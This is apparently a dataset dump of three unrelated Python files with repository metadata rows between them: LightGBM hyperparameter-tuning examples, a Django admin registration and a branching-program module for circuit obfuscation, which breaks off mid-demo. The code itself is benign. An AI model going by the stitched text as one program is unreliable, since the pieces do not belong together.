USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.bayes_opt_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, Optuna, no argument
# Same pipeline, using Optuna (TPE) for the search.
import parent_import
from tune_easy import LGBMRegressorTuning
import pandas as pd
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
tuning.optuna_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
tuning.plot_feature_importances()
# %% LGBMRegressor, GridSearch, all arguments
# Full example: every tuner argument supplied explicitly (grid, CV splitter,
# fixed estimator params, early-stopping fit params, axis scales, plots).
import parent_import
from tune_easy import LGBMRegressorTuning
from lightgbm import LGBMRegressor
import pandas as pd
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
# Candidate values for the tuned hyperparameters (full cartesian grid)
tuning_params = {'reg_alpha': [0.0001, 0.003, 0.1],
                 'reg_lambda': [0.0001, 0.1],
                 'num_leaves': [2, 3, 4, 6],
                 'colsample_bytree': [0.4, 0.7, 1.0],
                 'subsample': [0.4, 1.0],
                 'subsample_freq': [0, 7],
                 'min_child_samples': [0, 2, 5, 10]
                 }
lgbmr = LGBMRegressor()
not_opt_params = {'objective': 'regression', # loss function to minimize
                  'random_state': 42, # random seed
                  'boosting_type': 'gbdt', # booster type
                  'n_estimators': 10000 # max boosting rounds (training stops early once the eval metric fails to improve for early_stopping_rounds consecutive rounds)
                  }
fit_params = {'verbose': 0, # command-line output during training
              'early_stopping_rounds': 10, # stop when the eval metric has not improved for this many consecutive rounds
              'eval_metric': 'rmse', # eval metric used for early stopping
              'eval_set': [(X, y)]
              }
# Axis scale used when plotting each parameter's validation curve
param_scales = {'reg_alpha': 'log',
                'reg_lambda': 'log',
                'num_leaves': 'linear',
                'colsample_bytree': 'linear',
                'subsample': 'linear',
                'subsample_freq': 'linear',
                'min_child_samples': 'linear'
                }
# Wider sweeps used only for the validation-curve plots
validation_curve_params = {'reg_alpha': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
                           'reg_lambda': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
                           'num_leaves': [2, 4, 8, 16, 32, 64, 96, 128, 160, 192, 224, 256],
                           'colsample_bytree': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
                           'subsample': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
                           'subsample_freq': [0, 1, 2, 3, 4, 5, 6, 7],
                           'min_child_samples': [0, 2, 5, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
                           }
fig, axes = plt.subplots(1, 3, figsize=(12, 3))
tuning.plot_first_validation_curve(estimator=lgbmr, validation_curve_params=validation_curve_params,
                                   cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42, scoring='neg_mean_squared_error',
                                   not_opt_params=not_opt_params, param_scales=param_scales,
                                   plot_stats='median', axes=axes, fit_params=fit_params
                                   )
tuning.grid_search_tuning(estimator=lgbmr, tuning_params=tuning_params,
                          cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
                          scoring='neg_mean_squared_error',
                          not_opt_params=not_opt_params, param_scales=param_scales,
                          mlflow_logging=None, grid_kws={'n_jobs': 3},
                          **fit_params)
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['min_child_samples', 'reg_alpha', 'num_leaves', 'colsample_bytree'],
                       rounddigits_title=4, rank_number=2, rounddigits_score=4,
                       subplot_kws={'figsize':(12, 14)}, heat_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='median', ax=ax)
fig, axes = plt.subplots(1, 7, figsize=(30, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
                                  plot_stats='median', axes=axes)
tuning.plot_param_importances()
fig, ax = plt.subplots(1, 1, figsize=(4, 3))
tuning.plot_feature_importances(ax=ax)
# %% LGBMRegressor, Optuna, all arguments
# Full Optuna example: parameter *ranges* (tuples) instead of grids, integer
# parameters declared explicitly, TPE sampler seeded for reproducibility.
import parent_import
from tune_easy import LGBMRegressorTuning
from lightgbm import LGBMRegressor
import pandas as pd
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
import optuna
# Load dataset
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
TARGET_VARIABLE = 'approval_rate' # Target variable
USE_EXPLANATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # Explanatory variables
y = df_reg[TARGET_VARIABLE].values
X = df_reg[USE_EXPLANATORY].values
# Run parameter tuning
tuning = LGBMRegressorTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIABLE)
# (low, high) search ranges for the tuned hyperparameters
tuning_params = {'reg_alpha': (0.0001, 0.1),
                 'reg_lambda': (0.0001, 0.1),
                 'num_leaves': (2, 6),
                 'colsample_bytree': (0.4, 1.0),
                 'subsample': (0.4, 1.0),
                 'subsample_freq': (0, 7),
                 'min_child_samples': (0, 10)
                 }
lgbmr = LGBMRegressor()
not_opt_params = {'objective': 'regression', # loss function to minimize
                  'random_state': 42, # random seed
                  'boosting_type': 'gbdt', # booster type
                  'n_estimators': 10000 # max boosting rounds (training stops early once the eval metric fails to improve for early_stopping_rounds consecutive rounds)
                  }
fit_params = {'verbose': 0, # command-line output during training
              'early_stopping_rounds': 10, # stop when the eval metric has not improved for this many consecutive rounds
              'eval_metric': 'rmse', # eval metric used for early stopping
              'eval_set': [(X, y)]
              }
# Axis scale used when plotting each parameter's validation curve
param_scales = {'reg_alpha': 'log',
                'reg_lambda': 'log',
                'num_leaves': 'linear',
                'colsample_bytree': 'linear',
                'subsample': 'linear',
                'subsample_freq': 'linear',
                'min_child_samples': 'linear'
                }
# Wider sweeps used only for the validation-curve plots
validation_curve_params = {'reg_alpha': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
                           'reg_lambda': [0, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10],
                           'num_leaves': [2, 4, 8, 16, 32, 64, 96, 128, 160, 192, 224, 256],
                           'colsample_bytree': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
                           'subsample': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],
                           'subsample_freq': [0, 1, 2, 3, 4, 5, 6, 7],
                           'min_child_samples': [0, 2, 5, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
                           }
# Parameters Optuna must sample as integers rather than floats
int_params = ['num_leaves', 'subsample_freq', 'min_child_samples']
tuning.optuna_tuning(estimator=lgbmr, tuning_params=tuning_params,
                     cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
                     scoring='neg_mean_squared_error', n_trials=400,
                     study_kws={'sampler': optuna.samplers.TPESampler(seed=42)},
                     optimize_kws={'show_progress_bar': True},
                     not_opt_params=not_opt_params, int_params=int_params, param_scales=param_scales,
                     mlflow_logging=None,
                     **fit_params
                     )
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['min_child_samples', 'reg_alpha', 'num_leaves', 'colsample_bytree'],
                       rounddigits_title=4, rank_number=2, rounddigits_score=4,
                       subplot_kws={'figsize':(20, 15)}, heat_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='median', ax=ax)
fig, axes = plt.subplots(1, 7, figsize=(30, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
                                  plot_stats='median', axes=axes)
tuning.plot_param_importances()
fig, ax = plt.subplots(1, 1, figsize=(4, 3))
tuning.plot_feature_importances(ax=ax)
# %%
| 48.753191
| 130
| 0.646242
| 1,506
| 11,457
| 4.63745
| 0.13745
| 0.05441
| 0.027491
| 0.0189
| 0.946449
| 0.930842
| 0.922251
| 0.922251
| 0.913087
| 0.913087
| 0
| 0.060079
| 0.22711
| 11,457
| 234
| 131
| 48.961538
| 0.728628
| 0.086759
| 0
| 0.761905
| 0
| 0
| 0.172506
| 0.035135
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.17619
| 0
| 0.17619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8127bef3c64ef573c5b7def9e716c2c99bb6edaa
| 215
|
py
|
Python
|
library/admin.py
|
sp35/LibraryMS-Backend
|
fb763bac2ea9f2198670de1fe8b364c78f6779e2
|
[
"MIT"
] | null | null | null |
library/admin.py
|
sp35/LibraryMS-Backend
|
fb763bac2ea9f2198670de1fe8b364c78f6779e2
|
[
"MIT"
] | null | null | null |
library/admin.py
|
sp35/LibraryMS-Backend
|
fb763bac2ea9f2198670de1fe8b364c78f6779e2
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Book, BorrowedBook, Librarian, Student
# Register the library models with the default admin site so they can be
# managed through Django's admin interface.
for model in (Book, Student, Librarian, BorrowedBook):
    admin.site.register(model)
| 21.5
| 58
| 0.818605
| 28
| 215
| 6.285714
| 0.428571
| 0.204545
| 0.386364
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083721
| 215
| 9
| 59
| 23.888889
| 0.893401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
be2156769a82adbff9a270c51f1693e7b50afffc
| 13,344
|
py
|
Python
|
obfusc8/bp.py
|
tum-i22/indistinguishability-obfuscation
|
67e5b7f8eedbb65434c252611b303b210c672b5b
|
[
"Apache-2.0"
] | 19
|
2015-05-22T17:41:50.000Z
|
2020-09-09T11:08:53.000Z
|
obfusc8/bp.py
|
tum-i22/indistinguishability-obfuscation
|
67e5b7f8eedbb65434c252611b303b210c672b5b
|
[
"Apache-2.0"
] | 1
|
2021-03-19T16:07:00.000Z
|
2021-03-19T16:47:26.000Z
|
obfusc8/bp.py
|
nathanawmk/indistinguishability-obfuscation
|
67e5b7f8eedbb65434c252611b303b210c672b5b
|
[
"Apache-2.0"
] | 4
|
2020-10-13T05:10:09.000Z
|
2021-04-06T07:49:06.000Z
|
"""Matrix Branching Programs with 5x5 permutation matrices
This module implements a variant of Matrix Branching Programs that is
close to the ones described by Barrington in [0]. Additionally it
implements the transformation of logical circuits consisting solely of
AND- and NOT-gates to these MBPs using Barrington's Theorem. The resulting
MBPs make use of numpy arrays as matrices for their speed benefits in
comparison to Sage matrices.
In order to speed up the transformation and to relieve memory consumption
the transformation relies on integer IDs instead of permutations / matrices.
[0] D. A. Barrington. "Bounded-width polynomial-size branching programs
recognize exactly those languages in NC 1." Proceedings of the eighteenth
annual ACM symposium on Theory of computing. ACM, 1986.
"""
from numpy import array, where, dot
from sys import getsizeof
from os import remove
from itertools import izip
import cPickle
import logging
#---------- Branching Programs ------------------
class BranchingProgram(object):
    """Branching programs as described by Barrington using 5x5
    permutation matrices as instructions.
    indexList contains all values of inp(i)
    ins0 and ins1 contain all matrices A_i,0 / A_i,1 respectively
    """

    def __init__(self, ins0, ins1, indexList, zeroPerm, onePerm):
        # ins0/ins1: per-step permutation matrices used when the inspected
        # input bit is 0 / 1. indexList[i] names the input bit read at step i.
        # zeroPerm/onePerm: the permutations the full product must equal for
        # the program to output 0 / 1; they must differ.
        assert(len(ins0) == len(ins1))
        assert(not (zeroPerm==onePerm).all())
        assert(len(indexList) == len(ins0))
        self.length = len(ins0)
        self.ins0 = ins0
        self.ins1 = ins1
        self.indexList = indexList
        self.zeroPerm = zeroPerm
        self.onePerm = onePerm

    def evaluate(self, inputs):
        """Evaluate the branching program for list of input values"""
        logging.info('Evaluating branching program for inputs: %s', str(inputs))
        assert(len(inputs) >= max(self.indexList))
        assert(all(bit in (0,1) for bit in inputs))
        # Pick A_i,1 or A_i,0 per step depending on the selected input bit,
        # then multiply all chosen matrices together (reduce is the Python 2
        # builtin here).
        matrices = ((in1 if inputs[index] else in0) for in0, in1, index in izip(self.ins0, self.ins1, self.indexList))
        result = reduce(dot, matrices)
        # ret stays -1 (and the assert fires) if the product matches neither
        # designated output permutation.
        ret = -1
        if (result==self.zeroPerm).all(): ret = 0
        if (result==self.onePerm).all(): ret = 1
        logging.info('MBP evaluation result: %d', ret)
        assert(ret != -1)
        return ret

    def getInstructionString(self):
        """Return a human readable string of the instructions"""
        strIns0 = map(_matrix2cycle, self.ins0)
        strIns1 = map(_matrix2cycle, self.ins1)
        # One "<inputIndex,perm0,perm1>" triple per instruction.
        strList = ["<%d,%s,%s>"%a for a in izip(self.indexList, strIns0, strIns1)]
        return ''.join(strList)

    @classmethod
    def fromCircuit(cls, circuit, caching=True):
        """Return a reverse-normalized (onePerm = identity) branching
        program as required by the rest of the construction
        This implementation uses integer IDs instead of permutation
        matrices during the generation for performance reasons.
        For a breakdown of how this mappings were created refer to
        the module generate_bp_mappings
        """
        mappings = precalculatedMappings()
        id2perms = precalculatedId2PermList()
        # Mutable counter shared by all recursive fastGetIns calls; numbers
        # the temp files used to spill intermediate ID lists to disk.
        class saveCtr: x=1
        def fastGetIns(gate):
            # Returns (id0List, id1List, indexList): permutation IDs for the
            # 0/1 instruction sequences plus the input index of each step.
            # gate.getType(): -1 = circuit input, 0 = NOT, 1 = AND
            # (presumably — inferred from the branch comments; confirm
            # against the circuit module).
            #Input
            if gate.getType() == -1:
                return ([0], [1], [gate.pos])
            #NotGate
            elif gate.getType() == 0:
                id0List, id1List, indexList = fastGetIns(gate.input1)
                # NOT: remap the last instruction with mappings[0] and all
                # earlier ones with mappings[1].
                id0List[-1] = mappings[0][id0List[-1]]
                id1List[-1] = mappings[0][id1List[-1]]
                id0List[:-1] = [mappings[1][id] for id in id0List[:-1]]
                id1List[:-1] = [mappings[1][id] for id in id1List[:-1]]
                return (id0List, id1List, indexList)
            elif gate.getType() == 1:
                # AND: Barrington's construction concatenates four remapped
                # copies (two of each operand), doubling the program length.
                id0List1, id1List1, indexList1 = fastGetIns(gate.input1)
                a01 = [mappings[2][id] for id in id0List1]
                a11 = [mappings[2][id] for id in id1List1]
                a03 = [mappings[3][id] for id in id0List1]
                a13 = [mappings[3][id] for id in id1List1]
                #'garbage collection'
                id0List1 = None
                id1List1 = None
                #write to disk
                # Spill the left-operand lists before recursing into the
                # right operand to bound peak memory usage.
                if caching==True and getsizeof(a01) > 1000000: #1 mb
                    logging.info('caching with size %d...'%getsizeof(a01))
                    with open('%d.tmp'%saveCtr.x, 'wb') as output:
                        cPickle.dump(a01, output, -1)
                        cPickle.dump(a11, output, -1)
                        cPickle.dump(a03, output, -1)
                        cPickle.dump(a13, output, -1)
                    a01 = None
                    a11 = None
                    a03 = None
                    a13 = None
                    saveCtr.x += 1
                id0List2, id1List2, indexList2 = fastGetIns(gate.input2)
                a02 = [mappings[4][id] for id in id0List2]
                a12 = [mappings[4][id] for id in id1List2]
                a04 = [mappings[5][id] for id in id0List2]
                a14 = [mappings[5][id] for id in id1List2]
                #'garbage collection'
                id0List2 = None
                id1List2 = None
                #load from disk
                # a01 is None exactly when the spill above happened; reload
                # and delete the temp file. NOTE: 'input' shadows the builtin.
                if a01 is None:
                    logging.info('loading...')
                    saveCtr.x -= 1
                    with open('%d.tmp'%saveCtr.x, 'rb') as input:
                        a01 = cPickle.load(input)
                        a11 = cPickle.load(input)
                        a03 = cPickle.load(input)
                        a13 = cPickle.load(input)
                    remove('%d.tmp'%saveCtr.x)
                return (a01+a02+a03+a04, a11+a12+a13+a14, indexList1+indexList2+indexList1+indexList2)
            raise AttributeError
        logging.info('Calculating permutation idList')
        id0List, id1List, indexList = fastGetIns(circuit.outputGate)
        logging.info('Mapping ids to permutation matrices')
        #instructions = [tuple(id2perms[id] for id in t) for t in idList]
        ins0 = [id2perms[id] for id in id0List]
        ins1 = [id2perms[id] for id in id1List]
        # Trailing fixed instruction reverse-normalizes the program so that
        # the one-output product is the identity.
        ins0.append(_normalInv())
        ins1.append(_normalInv())
        indexList.append(0)
        return BranchingProgram(ins0, ins1, indexList, _normalInv(), _identity())

    @classmethod
    def estimateBPSize(cls, circuit):
        """Recursively calculates the expected size of the BP belonging to circuit.
        Uses the formula
        len_BP(gate) = | 1 if type(gate) = Input
        | len(gate.input) if type(gate) = NOT
        | 2*len(gate.input1) + 2*len(gate.input2) if type(gate) = AND
        Note that this 'estimation' should indeed be exact.
        """
        # Memoized on gate.id so shared sub-circuits are counted once.
        cache = {}
        def _estimateBPSize(gate):
            if gate.getType() == -1:
                return 1
            if gate.id in cache:
                ret = cache[gate.id]
            else:
                if gate.getType() == 0:
                    ret = _estimateBPSize(gate.input1)
                elif gate.getType() == 1:
                    ret = 2*_estimateBPSize(gate.input1)+2*_estimateBPSize(gate.input2)
                cache[gate.id] = ret
            return ret
        # +1 accounts for the reverse-normalization instruction appended by
        # fromCircuit.
        return _estimateBPSize(circuit.outputGate)+1

    def __str__(self):
        return 'Branching Program of length %d, Zero Perm: %s, One Perm: %s' % \
            (self.length, _matrix2cycle(self.zeroPerm), _matrix2cycle(self.onePerm))
def _matrix2cycle(permMatrix):
"""Helper function to get cycle notation of permutation matrix"""
lookedAt = [0]*permMatrix.shape[0]
ret = ''
indices = list(where(permMatrix==1)[1])
while not all(lookedAt):
start = lookedAt.index(0)
if indices[start] != start: #doesn't point to itself
ret += '('+str(start)
curr = indices[start]
while start!=curr:
ret += str(curr)
lookedAt[curr] = 1
curr = indices[curr]
ret += ')'
lookedAt[start] = 1
if ret=='': ret='e'
return ret
def _identity(): return array([[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1]]) #e
def _normalInv(): return array([[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0]]) #(04321)
def precalculatedMappings():
    """Generated using calculateMappings() from generate_bp_mappings.py"""
    # Six precomputed ID-remapping tables (each a permutation of 0..59) used
    # by BranchingProgram.fromCircuit: index 0/1 for NOT gates, 2..5 for the
    # four AND-gate sub-sequences. Do not edit by hand — regenerate instead.
    return [[1,0,7,8,10,11,14,2,3,21,4,5,29,23,6,15,16,30,33,34,37,9,44,13,45,32,47,41,39,12,17,50,25,18,19,54,51,20,42,28,53,27,38,43,22,24,49,26,58,46,31,36,52,40,35,57,59,55,48,56],[0,2,1,4,3,8,9,16,5,6,22,26,14,15,12,13,7,18,17,32,31,40,10,24,23,41,11,28,27,48,49,20,19,51,54,39,38,43,36,35,21,25,46,37,47,45,42,44,29,30,50,33,57,58,34,56,55,52,53,59],[0,3,4,1,2,6,5,17,9,8,23,27,13,12,15,14,18,7,16,20,19,25,24,10,22,21,28,11,26,49,48,32,31,47,55,36,35,46,39,38,41,40,43,42,51,45,37,33,30,29,50,44,53,52,56,34,54,58,57,59],[0,4,3,2,1,9,8,18,6,5,24,28,15,14,13,12,17,16,7,31,32,41,23,22,10,40,27,26,11,30,29,19,20,44,56,38,39,42,35,36,25,21,37,46,33,45,43,51,49,48,50,47,58,57,55,54,34,53,52,59],[0,5,6,9,8,12,15,19,13,14,25,26,1,4,3,2,20,31,32,35,38,42,21,40,41,37,28,27,11,49,30,39,36,52,44,7,18,10,16,17,43,46,22,23,57,50,24,58,29,48,59,53,55,54,51,33,47,34,56,45],[0,6,5,8,9,13,14,20,12,15,21,28,3,2,1,4,19,32,31,36,39,43,25,41,40,46,26,11,27,29,48,38,35,53,51,17,16,23,18,7,42,37,24,10,58,50,22,57,49,30,59,52,34,56,44,47,33,55,54,45]]
def precalculatedId2PermList():
    """Generated in generate_bp_mappings.py"""
    # Lookup table: permutation ID (0..59) -> 5x5 permutation matrix. Entry 0
    # is the identity, entry 2 the (04321) cycle used for normalization.
    # Reassembled one array per line (the source literal was a single long
    # line); do not edit by hand — regenerate instead.
    return [
        array([[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1]]),
        array([[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1],[1,0,0,0,0]]),
        array([[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,1,0]]),
        array([[0,0,1,0,0],[0,0,0,0,1],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,1,0]]),
        array([[0,0,0,1,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,1,0,0,0]]),
        array([[0,1,0,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,1,0,0]]),
        array([[0,0,1,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,0,1,0]]),
        array([[0,0,1,0,0],[0,0,0,1,0],[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0]]),
        array([[0,0,0,0,1],[0,0,0,1,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,1,0,0]]),
        array([[0,0,0,1,0],[0,0,1,0,0],[0,0,0,0,1],[0,1,0,0,0],[1,0,0,0,0]]),
        array([[0,0,0,1,0],[1,0,0,0,0],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,0,1]]),
        array([[1,0,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,1,0]]),
        array([[0,1,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[1,0,0,0,0],[0,0,1,0,0]]),
        array([[0,0,1,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,1,0,0,0],[1,0,0,0,0]]),
        array([[0,0,0,0,1],[0,0,0,1,0],[1,0,0,0,0],[0,0,1,0,0],[0,1,0,0,0]]),
        array([[0,0,0,1,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,1,0,0,0]]),
        array([[0,0,0,1,0],[0,0,0,0,1],[1,0,0,0,0],[0,1,0,0,0],[0,0,1,0,0]]),
        array([[0,1,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,0,1,0,0],[1,0,0,0,0]]),
        array([[0,0,0,0,1],[1,0,0,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,1,0,0]]),
        array([[0,0,0,1,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,1,0,0],[1,0,0,0,0]]),
        array([[0,0,0,0,1],[0,0,1,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,1,0,0,0]]),
        array([[0,0,0,1,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,0,1]]),
        array([[0,0,1,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[1,0,0,0,0]]),
        array([[0,0,0,0,1],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,1,0,0]]),
        array([[0,1,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,0,1]]),
        array([[0,0,0,0,1],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,1,0,0,0]]),
        array([[1,0,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,1,0,0,0]]),
        array([[1,0,0,0,0],[0,1,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,0,1,0,0]]),
        array([[1,0,0,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,0,1]]),
        array([[1,0,0,0,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,0,1,0],[0,0,1,0,0]]),
        array([[1,0,0,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,0,0,1,0]]),
        array([[0,1,0,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,1,0]]),
        array([[0,0,1,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,1,0,0,0]]),
        array([[0,0,1,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,0,1,0],[0,1,0,0,0]]),
        array([[0,0,0,1,0],[0,1,0,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,1,0,0]]),
        array([[0,0,0,0,1],[0,0,1,0,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,1,0]]),
        array([[0,0,0,1,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,1,0,0]]),
        array([[0,0,1,0,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,1,0],[0,0,0,0,1]]),
        array([[0,0,1,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,0,0,1],[1,0,0,0,0]]),
        array([[0,1,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[1,0,0,0,0],[0,0,0,1,0]]),
        array([[0,0,1,0,0],[0,1,0,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,0,0,0,1]]),
        array([[0,1,0,0,0],[0,0,0,0,1],[0,0,1,0,0],[0,0,0,1,0],[1,0,0,0,0]]),
        array([[0,0,0,0,1],[0,1,0,0,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,1,0]]),
        array([[0,0,0,1,0],[0,1,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[1,0,0,0,0]]),
        array([[0,0,0,0,1],[0,1,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[1,0,0,0,0]]),
        array([[1,0,0,0,0],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,0,1],[0,0,0,1,0]]),
        array([[0,1,0,0,0],[0,0,1,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,0,0,1]]),
        array([[0,1,0,0,0],[1,0,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[0,0,0,0,1]]),
        array([[1,0,0,0,0],[0,0,0,1,0],[0,0,1,0,0],[0,0,0,0,1],[0,1,0,0,0]]),
        array([[1,0,0,0,0],[0,0,1,0,0],[0,0,0,1,0],[0,1,0,0,0],[0,0,0,0,1]]),
        array([[1,0,0,0,0],[0,0,0,1,0],[0,0,0,0,1],[0,1,0,0,0],[0,0,1,0,0]]),
        array([[0,0,0,1,0],[0,0,0,0,1],[0,0,1,0,0],[1,0,0,0,0],[0,1,0,0,0]]),
        array([[0,0,0,1,0],[0,0,1,0,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,1]]),
        array([[0,0,0,0,1],[0,0,1,0,0],[0,1,0,0,0],[0,0,0,1,0],[1,0,0,0,0]]),
        array([[0,0,1,0,0],[0,0,0,1,0],[1,0,0,0,0],[0,1,0,0,0],[0,0,0,0,1]]),
        array([[0,0,0,0,1],[0,0,0,1,0],[0,0,1,0,0],[0,1,0,0,0],[1,0,0,0,0]]),
        array([[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,0,1,0,0]]),
        array([[0,0,1,0,0],[0,1,0,0,0],[1,0,0,0,0],[0,0,0,0,1],[0,0,0,1,0]]),
        array([[0,1,0,0,0],[1,0,0,0,0],[0,0,1,0,0],[0,0,0,0,1],[0,0,0,1,0]]),
        array([[1,0,0,0,0],[0,0,0,0,1],[0,0,0,1,0],[0,0,1,0,0],[0,1,0,0,0]])]
if __name__ == '__main__':
    # circuit2bp demo: build a boolean circuit, convert it into a branching
    # program, then exhaustively verify both evaluate identically on every
    # possible input assignment.
    from itertools import product
    from circuit import *

    inputLength = 8
    inputs = [Input('x') for _ in range(inputLength)]
